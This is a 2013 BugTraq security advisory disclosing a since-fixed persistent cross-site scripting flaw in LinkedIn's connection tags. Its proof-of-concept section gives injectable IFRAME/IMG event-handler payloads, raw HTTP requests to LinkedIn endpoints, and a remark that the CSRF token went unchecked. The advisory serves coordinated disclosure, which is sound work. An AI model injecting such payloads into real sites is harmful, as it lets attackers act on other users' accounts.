BugTraq
[ISecAuditors Security Advisories] LinkedIn social network is affected by Persistent Cross-Site Scripting vulnerability Nov 05 2013 02:44PM
ISecAuditors Security Advisories (advisories isecauditors com)
=============================================
INTERNET SECURITY AUDITORS ALERT 2013-005
- Original release date: 3rd March 2013
- Last revised: 10th March 2013
- Discovered by: Eduardo Garcia Melia
- Severity: 5.2/10 (CVSS Base Scored)
=============================================

I. VULNERABILITY
-------------------------
LinkedIn social network is affected by Persistent Cross-Site Scripting
vulnerability.

II. BACKGROUND
-------------------------
LinkedIn is a social networking service and website operates the world's
largest professional

network on the Internet with more than 187 million members in over 200
countries and territories.

More Information: http://press.linkedin.com/about

III. DESCRIPTION
-------------------------
LinkedIn social network is affected by Persistent Cross-Site Scripting
vulnerability. The

persistent (or stored) XSS vulnerability is a more devastating variant
of a cross-site scripting

flaw: it occurs when the data provided by the attacker is saved by the
server, and then

permanently displayed on "normal" pages returned to other users in the
course of regular

browsing, without proper HTML escaping. The affected resource is

http://www.linkedin.com/people/connections when you create new tags.

IV. PROOF OF CONCEPT
-------------------------
=========================
First Option
=========================
You can go to LinkedIn Contacts -> Connections -> Manage. After, on the
"Add New Tag" field, you

can put these tags, for example:

+ <IFRAME SRC=# onmouseover="alert('XSS')">
+ <IMG SRC=# onmouseover="alert('XSS')">
+ <IMG onmouseover="alert('XSS')">

Finally, you should pulse "Add New Tag" button, and then show you the
injection.

=========================
Second Option
=========================
You can go to LinkedIn Contacts -> Connections -> All Connections and
then select one contact.

After, on the right panel, you have a "Tags:" label, and you should
pulse "Edit tags". Then you

can put this tags, for example:

+ <IFRAME SRC=# onmouseover="alert('XSS')">
+ <IMG onmouseover="alert('XSS')">

Finally, you should pulse "+" button, and then show you the injection.

=========================
REQUESTS
=========================
First, create <IFRAME SRC=# onmouseover="alert('XSS')"> Tag:

REQUEST 1:

POST /people/create-tag?csrfToken=TOKEN_CSRF HTTP/1.1
Host: www.linkedin.com
Origin: http://www.linkedin.com
X-Requested-With: XMLHttpRequest
X-IsAJAXForm: 1
Cookie: XXXX


&tagContext=undefined&tagName=%3CIFRAME%20SRC%3D%23%20onmouseover%3D%22a
lert('XSS')%22%3E

RESPONSE 1:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Date: Sun, 03 Mar 2013 16:49:14 GMT
X-FS-TXN-ID: 2b654458ea50
X-FS-UUID: e0463ca154f7e712703c4a69cb2a0000
X-LI-UUID: 4EY8oVT35xJwPEppyyoAAA==
Age: 1
X-Content-Type-Options: nosniff
X-XSS-Protection: 0

{"content":"113275897","status":"ok"}

Second, make request for show you the tags name's:

REQUEST 2:
POST /people/fetch-tags?csrfToken=ajax%3A7023500174643473361 HTTP/1.1
Host: www.linkedin.com
Origin: http://www.linkedin.com
X-Requested-With: XMLHttpRequest
User-Agent: MSIE 9.0
X-IsAJAXForm: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://www.linkedin.com/people/connections
Cookie: XXX

&tagContext=conn_detail_panel&memIds=M-220814631

Or without the csrfToken, because not verify that the csrfToken value
matches with cookie session

token.

RESPONSE:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Date: Sun, 03 Mar 2013 16:50:37 GMT
X-FS-TXN-ID: 2b8fc977b850
X-FS-UUID: a0d6d9c867f7e712d0ff6b10ed2a0000
X-LI-UUID: oNbZyGf35xLQ/2sQ7SoAAA==
Age: 0
X-Content-Type-Options: nosniff
X-XSS-Protection: 0

{"content":"[\"{\\\"id\\\":\\\"104055107\\\",\\\"name\\\":\\\"<IFRAME
SRC=# onmouseover=

\\\\\\\"alert('XSS')\\\\\\\">\\\",\\\"bucket\\\":\\\"tagsNoneHave\\\"}\"
,\"{\\\"id\\\":\
\"104044777\\\",\\\"name\\\":\\\"classmates\\\",\\\"bucket\\\":\\\"tagsN
oneHave\\\"}\",\"{\\\"id

\\\":\\\"104044787\\\",\\\"name\\\":\\\"colleagues\\\",\\\"bucket\\\":\\
\"tagsNoneHave\\\"}\",

\"{\\\"id\\\":\\\"104044767\\\",\\\"name\\\":\\\"friends\\\",\\\"bucket\
\\":\\\"tagsAllHave\
\"}\",\"{\\\"id\\\":\\\"104044797\\\",\\\"name\\\":\\\"group
members\\\",\\\"bucket\\\":\
\"tagsNoneHave\\\"}\",\"{\\\"id\\\":\\\"104044807\\\",\\\"name\\\":\\\"p
artners\\\",\\\"bucket\
\":\\\"tagsNoneHave\\\"}\"]","status":"ok"}

V. BUSINESS IMPACT
------------------------
If a malicious user will find a way to exploit this vulnerability could
make other users are

perform actions that he wanted in the application, since add them to
your network, to erase the

profile, because the csrf token is useless, since based on the user's
session.

VI. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the LinkedIn network:
http://www.linkedin.com
https://touch.www.linkedin.com

VII. SOLUTION
-------------------------
Linkedin applied a new contact management system.

VIII. REFERENCES
-------------------------
http://www.linkedin.com
http://www.isecauditors.com
http://en.wikipedia.org/wiki/Cross-site_scripting#Persistent

IX. CREDITS
-------------------------
These vulnerabilities have been discovered by
Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 03, 2013: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
March 03, 2013: Vulnerability acquired by Internet Security Auditors
(www.isecauditors.com)
March 10, 2013: Send to Sec Team.
July 4, 2013: Initial vendor notification sent
July 9, 2013: Vendor implemented a fix
November 11, 2013: Disclosure

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or

guarantees of fitness of use or otherwise. Internet Security Auditors
accepts no responsibility

for any damage caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security,

penetration testing, security compliance implementation and assessing.
Our clients include some

of the largest companies in areas such as finance, telecommunications,
insurance, ITC, etc. We

are vendor independent provider with a deep expertise since 2001. Our
efforts in R&D include

vulnerability research, open security project collaboration and
whitepapers, presentations and

security events participation and promotion. For further information
regarding our security

services, contact us.

XIV. FOLLOW US
-------------------------
You can follow Internet Security Auditors, news and security advisories at:
https://www.facebook.com/ISecAuditors
https://twitter.com/ISecAuditors
http://www.linkedin.com/company/internet-security-auditors
http://www.youtube.com/user/ISecAuditors

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus